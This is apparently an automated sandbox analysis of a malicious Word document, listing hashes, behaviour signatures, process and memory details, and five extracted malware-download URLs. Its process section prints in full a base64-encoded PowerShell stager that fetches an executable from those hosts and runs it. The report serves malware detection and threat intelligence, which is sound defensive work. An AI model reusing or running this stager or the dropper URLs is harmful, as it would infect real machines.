Analysis

  • max time kernel
    78s
  • max time network
    85s
  • platform
    windows10-1703_x64
  • resource
    win10-20231215-en
  • resource tags

    arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
  • submitted
    03/01/2024, 19:39

General

  • Target

    PO-465514-180820.doc

  • Size

    174KB

  • MD5

    d7e6921bfd008f707ba52dee374ff3db

  • SHA1

    833bf5524a745a315c083067f2cbbf037fa35d56

  • SHA256

    044aa7e93ec81b297b53aaebad9bbac1a9d754219b001aaf5d4261665af30bc7

  • SHA512

    12a527967ad448075519fb57954b1c2cab1f049de042309b9554c689cf4d0f8e99226cbb1e7dd41d9379914b3aaf75f51785573860f77662495d44e6539dfe9a

  • SSDEEP

    3072:fNw4PrXcuQuvpzm4bkiaMQgAlSKQg0g3Vwse:bDRv1m4bnQgISKQg0gFwse

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://52550750-56-20180826151453.webstarterz.com/savewayexpressthai.com/jnze_2o3j_k/

exe.dropper

http://oubaina.com/wp-includes/lqkz_nvr_1avf4/

exe.dropper

https://www.msbc.kz/data/k527_5_cbdvv5bi19/

exe.dropper

http://okcupidating.com/im/fsq_esj_qgx060p/

exe.dropper

http://bike-nomad.com/cgi-bin/7n_0x0_62mnzyh9q/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PO-465514-180820.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4436
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABPAGcAbwB1AF8ANQAxAD0AKAAnAFEAdAA3ACcAKwAnADEAJwArACcAdABsADUAJwApADsALgAoACcAbgBlACcAKwAnAHcALQBpACcAKwAnAHQAZQBtACcAKQAgACQARQBOAFYAOgB0AEUAbQBwAFwATwBGAEYASQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIARQBjAHQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAEMAVQByAGkAVAB5AGAAUAByAE8AVABgAE8AQwBgAE8AbAAiACAAPQAgACgAJwB0ACcAKwAnAGwAcwAxADIAJwArACcALAAgACcAKwAnAHQAbABzACcAKwAnADEAMQAsACAAdABsAHMAJwApADsAJABRAGEAawBmAG8AMABxACAAPQAgACgAJwBaADAAJwArACcAZgB2ADMAawBiAGcAJwApADsAJABCAHIAdgAzADUAcgBzAD0AKAAnAEUANgBoACcAKwAnADQAJwArACcAbgBrAG4AJwApADsAJABFAGMAOQB3ADQAZQAwAD0AJABlAG4AdgA6AHQAZQBtAHAAKwAoACgAJwBOACcAKwAnADMAcABPACcAKwAnAGYAZgBpAGMAZQAyADAAMQA5AE4AMwAnACsAJwBwACcAKQAuACIAcgBlAGAAUABsAGAAQQBjAEUAIgAoACcATgAzAHAAJwAsAFsAcwBUAHIAaQBOAGcAXQBbAEMASABhAFIAXQA5ADIAKQApACsAJABRAGEAawBmAG8AMABxACsAKAAnAC4AZQB4ACcAKwAnAGUAJwApADsAJABaAF8AagBqAGkAMwBtAD0AKAAnAE8AZwBwADUAJwArACcANwB3ACcAKwAnAGoAJwApADsAJABZADcAagBtAHgAegA4AD0AJgAoACcAbgBlAHcALQAnACsAJwBvAGIAagBlACcAKwAnAGMAdAAnACkAIABOAEUAVAAuAHcAZQBiAGMATABJAEUAbgB0ADsAJABJAG4AbgBlAHcAYwBfAD0AKAAnAGgAdAB0AHAAJwArACcAOgAnACsAJwAvACcAKwAnAC8ANQAnACsAJwAyACcAKwAnADUAJwArACcANQAnACsAJwAwACcAKwAnADcANQAwAC0ANQAnACsAJwA2ACcAKwAnAC0AMgAwADEAOAAwADgAMgAnACsAJwA2ADEANQAxACcAKwAnADQANQAnACsAJwAzACcAKwAnAC4AdwBlACcAKwAnAGIAcwB0AGEAcgB0AGUAJwArACcAcgB6ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBzAGEAJwArACcAdgAnACsAJwBlAHcAYQB5AGUAeABwAHIAZQBzAHMAdABoAGEAaQAnACsAJwAuACcAKwAnAGMAbwBtAC8AagAnACsAJwBuACcAKwAnAHoAZQBfADIAbwAnACsAJwAzAGoAXwBrAC8AKgBoAHQAdAAnACsAJwBwADoALwAvAG8AdQBiAGEAaQBuAGEALgAnACsAJwBjACcAKwAnAG8AbQAnACsAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGkAJwArACcAbgBjAGwAdQBkACcAKwAnAGUAcwAnACsAJwAvAGwAcQBrAHoAXwBuACcAKwAnAHYAcgBfACcAKwAnADEAYQAnACsAJwB2AGYANAAvACoAaAAnACsAJwB0ACcAKwAnAHQAcABzADoALwAnACsAJwAvAHcAdwB3AC4AbQBzAGIAYwAnACsAJwAuAGsAegAnACsAJwAvAGQAYQB0AGEALwBrACcAKwAnADUAJwArACcAMgA3AF8ANQAnACsAJwBfAGMAYgAnACsAJwBkAHYAdgA1AGIAaQAxADkALwAqAGgAdAB0AHAAOgAvAC8AbwAnACsAJwBrACcAKwAnAGMAJwArACcAdQAnACsAJwBwAGkAJwArACcAZABhAHQAaQBuAGcALgBjACcAKwAnAG8AbQAnACsAJwAvACcAKwAnAGkAbQAvACcAKwAnAGYAcwBxACcAKwAnAF8AZQAnACsAJwBzACcAKwAnAGoAJwArACcAXwAnACsAJwBxACcAKwAnAGcAJwArACcAeAAwADYAJwArACcAMABwAC8AKgAnACsAJwBoAHQAdABwADoALwAvACcAKwAnAGIAJwArACcAaQBrAGUALQBuAG8AbQAnACsAJwBhAGQALgBjAG8AbQAvAGMAZwBpAC0AJwArACcAYgAnACsAJwBpACcAKwAnAG4ALwA3AG4AXwAwACcAKwAnAHgAJwArACcAMABfADYAMgBtACcAKwAnAG4AegAnACsAJwB5ACcAKwAnAGgAJwArACcAOQAnACsAJwBxAC8AJwApAC4AIgBzAFAAYABsAEkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEYAZQA4AG4AZQBnADQAPQAoACcASwAnACsAJwB5ACcAKwAnAG0AcgB3ADkAdwAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABNAHMAdQBvAG4AaAA4ACAAaQBuACAAJABJAG4AbgBlAHcAYwBfACkAewB0AHIAeQB7ACQAWQA3AGoAbQB4AHoAOAAuACIARABvAFcAYABOAEwAbwBBAGQAYABGAGkAYABMAEUAIgAoACQATQBzAHUAbwBuAGgAOAAsACAAJABFAGMAOQB3ADQAZQAwACkAOwAkAFUAaQAzAGwANAA5AGcAPQAoACcARABvACcAKwAnAGgAeABiACcAKwAnAHoAZwAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJACcAKwAnAHQAZQBtACcAKQAgACQARQBjADkAdwA0AGUAMAApAC4AIgBsAEUAbgBnAGAAVABoACIAIAAtAGcAZQAgADMAMQA0ADUAMQApACAAewAmACgAJwBJAG4AdgBvACcAKwAnAGsAJwArACcAZQAtAEkAdABlAG0AJwApACgAJABFAGMAOQB3ADQAZQAwACkAOwAkAEMAdwBpAG8AXwBoADUAPQAoACcARQAnACsAJwA2AHYAcAA3AHYAdwAnACkAOwBiAHIAZQBhAGsAOwAkAFQAYQB5ADUAMABsAGsAPQAoACcAUABoADEAMABnACcAKwAnAGIAMQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUANwB0AG0AbgBrADQAPQAoACcAWQBlAHcAYwB3ACcAKwAnADgAJwArACcAawAnACkA
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4768

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m3h44hu1.hp0.ps1

          Filesize

          1B

          MD5

          c4ca4238a0b923820dcc509a6f75849b

          SHA1

          356a192b7913b04c54574d18c28d46e6395428ab

          SHA256

          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

          SHA512

          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

        • memory/4436-35-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-305-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-3-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-4-0x00007FFDA9870000-0x00007FFDA9880000-memory.dmp

          Filesize

          64KB

        • memory/4436-5-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-8-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-9-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-10-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-11-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-12-0x00007FFDA5FB0000-0x00007FFDA5FC0000-memory.dmp

          Filesize

          64KB

        • memory/4436-13-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-14-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-15-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-16-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-17-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-19-0x00007FFDA5FB0000-0x00007FFDA5FC0000-memory.dmp

          Filesize

          64KB

        • memory/4436-20-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-22-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-25-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-28-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-23-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-29-0x00007FFDE96F0000-0x00007FFDE979E000-memory.dmp

          Filesize

          696KB

        • memory/4436-18-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-30-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-2-0x00007FFDA9870000-0x00007FFDA9880000-memory.dmp

          Filesize

          64KB

        • memory/4436-32-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-348-0x0000018348880000-0x0000018348A80000-memory.dmp

          Filesize

          2.0MB

        • memory/4436-41-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-36-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-173-0x00000183477D0000-0x00000183487A0000-memory.dmp

          Filesize

          15.8MB

        • memory/4436-174-0x0000018348880000-0x0000018348A80000-memory.dmp

          Filesize

          2.0MB

        • memory/4436-309-0x00000183477D0000-0x00000183487A0000-memory.dmp

          Filesize

          15.8MB

        • memory/4436-308-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-307-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-306-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-38-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-1-0x00007FFDA9870000-0x00007FFDA9880000-memory.dmp

          Filesize

          64KB

        • memory/4436-272-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-0-0x00007FFDA9870000-0x00007FFDA9880000-memory.dmp

          Filesize

          64KB

        • memory/4436-300-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-301-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-302-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-303-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4436-304-0x00007FFDE97E0000-0x00007FFDE99BB000-memory.dmp

          Filesize

          1.9MB

        • memory/4768-274-0x00000220E9BE0000-0x00000220E9BF0000-memory.dmp

          Filesize

          64KB

        • memory/4768-244-0x00000220E9BE0000-0x00000220E9BF0000-memory.dmp

          Filesize

          64KB

        • memory/4768-243-0x00000220E9BE0000-0x00000220E9BF0000-memory.dmp

          Filesize

          64KB

        • memory/4768-242-0x00007FFDC2250000-0x00007FFDC2C3C000-memory.dmp

          Filesize

          9.9MB

        • memory/4768-241-0x00000220E9BB0000-0x00000220E9BD2000-memory.dmp

          Filesize

          136KB

        • memory/4768-347-0x00007FFDC2250000-0x00007FFDC2C3C000-memory.dmp

          Filesize

          9.9MB

        • memory/4768-249-0x00000220E9E90000-0x00000220E9F06000-memory.dmp

          Filesize

          472KB